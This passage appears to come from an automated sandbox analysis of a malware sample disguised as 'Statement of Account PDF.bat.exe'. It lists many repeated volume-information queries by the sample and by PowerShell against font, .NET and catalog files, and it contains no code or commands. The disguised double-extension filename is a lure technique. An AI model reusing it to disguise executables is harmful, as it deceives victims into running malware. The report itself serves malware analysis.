                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
